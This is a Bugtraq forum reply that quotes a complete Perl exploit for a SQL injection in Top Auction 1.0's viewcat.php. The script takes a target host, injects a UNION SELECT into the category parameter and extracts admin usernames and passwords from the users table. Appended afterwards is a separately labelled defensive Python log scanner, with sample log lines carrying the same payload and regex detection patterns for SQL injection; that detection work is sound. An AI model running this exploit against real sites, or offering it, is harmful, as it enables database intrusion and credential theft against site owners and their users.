Re: Top Auction 1.0 (viewcat.php) Remote Blind SQL Injection //

Board: Bugtraq | Author: (blank) | Time: 19 years ago (2007/04/22 00:31) | Edited | Pushes: 0 (0/0/0)
Comments: 0, participants: 0, latest in thread: 2/2
Isn't this ajann's find / code? http://www.milw0rm.com/exploits/3456

/str0ke

On 21 Apr 2007 12:46:35 -0000, seko@se-ko.info <seko@se-ko.info> wrote:
> #!/usr/bin/perl
> #Author : SekoMirza // French
> #Script Name : Top Auction 1.0 (viewcat.php) Remote Blind SQL Injection Exploit
> #Greetings : Sh4dowM4n , PhanTOmOrhcid , Starhack.0rg , CaRaMeL , MBrain! , and all Turkishz Hackerzz
> #S.Page : http://www.phplabs.com
>
>
> use IO::Socket;
> if(@ARGV < 1){
> print "
> [========================================================================
> [// Top Auction 1.0 (viewcat.php) Remote Blind SQL Injection Exploit
> [// Usage: exploit.pl [target]
> [// Example: exploit.pl victim.com
> [// Example: exploit.pl victim.com
> [//
> [========================================================================
> ";
> exit();
> }
> #Local variables
> $server = $ARGV[0];
> $server =~ s/(http:\/\/)//eg;
> $host = "http://".$server;
> $port = "80";
> $file = "/viewcat.php?category=";
>
> print "Script <DIR> : ";
> $dir = <STDIN>;
> chop ($dir);
>
> if ($dir =~ /exit/){
> print "-- Exploit Failed[You Are Exited] \n";
> exit();
> }
>
> if ($dir =~ /\//){}
> else {
> print "-- Exploit Failed[No DIR] \n";
> exit();
> }
>
>
> $target = "-1%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),nick,char(112,97,115,115,58),password),3%20from%20users/*";
> $target = $host.$dir.$file.$target;
>
> #Writing data to socket
> print "+**********************************************************************+\n";
> print "+ Trying to connect: $server\n";
> $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
> print $socket "GET $target HTTP/1.1\n";
> print $socket "Host: $server\n";
> print $socket "Accept: */*\n";
> print $socket "Connection: close\n\n";
> print "+ Connected!...\n";
> #Getting
> while($answer = <$socket>) {
> if ($answer =~ /username:(.*?)pass/){
> print "+ Exploit succeed! Getting admin information.\n";
> print "+ ---------------- +\n";
> print "+ Username: $1\n";
> }
>
> if ($answer =~ /pass:(.*?)<\/title>/){
> print "+ Password: $1\n";
> }
>
> if ($answer =~ /Syntax error/) {
> print "+ Exploit Failed : ( \n";
> print "+**********************************************************************+\n";
> exit();
> }
>
> if ($answer =~ /Internal Server Error/) {
> print "+ Exploit Failed : ( \n";
> print "+**********************************************************************+\n";
> exit();
> }
> }
>
>
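Added example for defenders, not part of str0ke's reply or the quoted script: a Python scanner that reads web-server access-log lines and flags the signature the quoted script sends to viewcat.php (a UNION SELECT in the category parameter, char()-encoded marker strings, and a trailing /* comment terminator), plus the common tautology form. The log format, IP addresses, timestamps, document paths and the four sample lines are constructed assumptions; the second sample line carries the same payload shape the quoted script builds.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample lines in Apache "combined" format (assumption; not from the post).
SAMPLE_LOG = """\
10.0.0.5 - - [21/Apr/2007:14:46:35 +0000] "GET /auction/viewcat.php?category=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [21/Apr/2007:14:47:02 +0000] "GET /auction/viewcat.php?category=-1%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),nick,char(112,97,115,115,58),password),3%20from%20users/* HTTP/1.1" 200 6011 "-" "-"
10.0.0.7 - - [21/Apr/2007:14:48:10 +0000] "GET /auction/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [21/Apr/2007:14:49:00 +0000] "GET /auction/viewcat.php?category=3%27%20OR%201%3D1--%20 HTTP/1.1" 200 5120 "-" "-"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Heuristic indicators evaluated against the URL-decoded value of each query parameter.
INDICATORS = [
    # UNION [ALL] SELECT, allowing whitespace or inline comments between the keywords.
    ("union_select", re.compile(r"\bunion\b[\s/*]+(all[\s/*]+)?select\b", re.I)),
    # char(n,n,...) used to smuggle marker strings such as "username:" past quote filters.
    ("char_encoding", re.compile(r"\bchar\s*\(\s*\d+(\s*,\s*\d+)+\s*\)", re.I)),
    # Trailing comment that discards the rest of the original query.
    ("comment_terminator", re.compile(r"(/\*|--\s|#)\s*$")),
    # Boolean tautology such as OR 1=1.
    ("tautology", re.compile(r"(\bor\b|\band\b)\s+\d+\s*=\s*\d+", re.I)),
]


def decode_param(value, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded payloads are normalised too."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(target):
    """Return a list of (param_name, indicator_label) hits for one request target."""
    hits = []
    query = urlsplit(target).query
    for pair in query.split("&"):
        if not pair:
            continue
        raw_name, _, raw_value = pair.partition("=")
        name = decode_param(raw_name)
        value = decode_param(raw_value)
        for label, pattern in INDICATORS:
            if pattern.search(value):
                hits.append((name, label))
    return hits


def scan_log(text):
    """Parse log lines and return one alert dict per request with at least one hit."""
    alerts = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not in the expected format; skip rather than guess
        hits = inspect_request(match.group("target"))
        if hits:
            alerts.append({
                "ip": match.group("ip"),
                "ts": match.group("ts"),
                "path": urlsplit(match.group("target")).path,
                "params": sorted({name for name, _ in hits}),
                "indicators": sorted({label for _, label in hits}),
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['ts']} {alert['ip']} {alert['path']} "
              f"params={alert['params']} indicators={alert['indicators']}")
```

The indicators are deliberately narrow so the scanner can run over bulk logs with a low false-positive rate; a legitimate value is unlikely to contain `union ... select`, a multi-argument `char()` call and a trailing `/*` at once, so treating the co-occurrence of several labels on one request as the high-confidence case is the intended use. The only durable fix on the application side is to bind the category value as a parameter (or cast it to an integer) before it reaches the query; this scanner is for finding attempts in historical logs, not a substitute for that.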
Article code (AID): #16AZnv00 (Bugtraq)